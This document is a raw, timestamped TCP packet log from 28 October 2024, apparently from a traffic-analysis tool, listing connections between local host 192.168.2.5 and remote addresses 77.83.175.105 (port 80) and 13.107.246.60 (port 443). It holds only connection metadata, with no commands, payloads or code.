                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660587072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660595894 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660613060 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.660628080 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661417007 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661432981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661447048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661462069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661464930 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661474943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661489010 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661489964 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661504984 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661519051 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661520004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661534071 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661537886 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661547899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661562920 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661566019 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661577940 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661592960 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.661608934 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662200928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662215948 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662230015 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662246943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662261963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662262917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662276030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662292004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662293911 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662306070 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662317038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662321091 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662337065 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662337065 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662357092 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.662384033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663039923 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663055897 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663069963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663084030 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663099051 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663110018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663111925 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663126945 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663150072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663151026 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663163900 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663176060 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663180113 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663196087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663201094 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663211107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663225889 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663228035 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663250923 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663280010 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.663995028 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664011002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664026022 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664041042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664047003 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664055109 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664056063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664071083 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664087057 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664096117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664102077 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664113998 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664118052 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664132118 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664138079 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664149046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664164066 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664165974 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664180040 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664187908 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664218903 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664802074 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.664905071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.677262068 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.677921057 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.677936077 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.678605080 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.678610086 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707653999 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707669973 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707684994 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707735062 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707756042 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707900047 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707923889 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707938910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.707984924 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708105087 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708120108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708153963 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708163977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708237886 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708261967 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708302975 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708470106 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.708512068 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.716490984 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718045950 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718096972 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718116999 CET49909443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718174934 CET49909443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718220949 CET49909443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718220949 CET49909443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718230963 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.718240023 CET4434990913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.721030951 CET49914443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.721085072 CET4434991413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.721232891 CET49914443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.721399069 CET49914443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.721434116 CET4434991413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722107887 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722347021 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722479105 CET49910443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722578049 CET49910443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722594023 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722613096 CET49910443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.722624063 CET4434991013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.726975918 CET49915443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.727015972 CET4434991513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.727236986 CET49915443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.727453947 CET49915443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.727473974 CET4434991513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778106928 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778177023 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778208017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778225899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778265953 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778341055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778357983 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778378963 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778409958 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778590918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778615952 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778657913 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778815985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778831959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778846025 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778870106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.778898001 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781066895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781125069 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781136036 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781152964 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781193972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781269073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781284094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781297922 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781312943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781326056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781328917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781344891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781372070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781632900 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781647921 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781670094 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781694889 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781769037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781785011 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781800985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781805038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781816959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781824112 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781833887 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781846046 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781847000 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781876087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.781889915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782216072 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782243967 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782259941 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782269955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782274961 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782289982 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782289982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782296896 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782315969 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782332897 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782349110 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782355070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782363892 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782377958 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782392979 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782413960 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782721043 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782736063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782763958 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782778025 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782783985 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782799959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782815933 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782833099 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782840967 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782847881 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782864094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782866001 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782885075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.782912016 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783396006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783411980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783426046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783440113 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783457041 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783464909 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783472061 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783488035 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783490896 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783503056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783520937 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783520937 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783535957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783543110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783562899 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783576012 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783981085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.783997059 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784012079 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784028053 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784034014 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784064054 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784248114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784262896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784279108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784293890 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784298897 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784307957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784323931 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784333944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784349918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784358978 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784365892 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784380913 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784387112 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784395933 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784414053 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784416914 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784429073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784440994 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784446001 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784456968 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.784482956 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785253048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785269976 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785284042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.785300016 CET804987577.83.175.105192.168.2.5
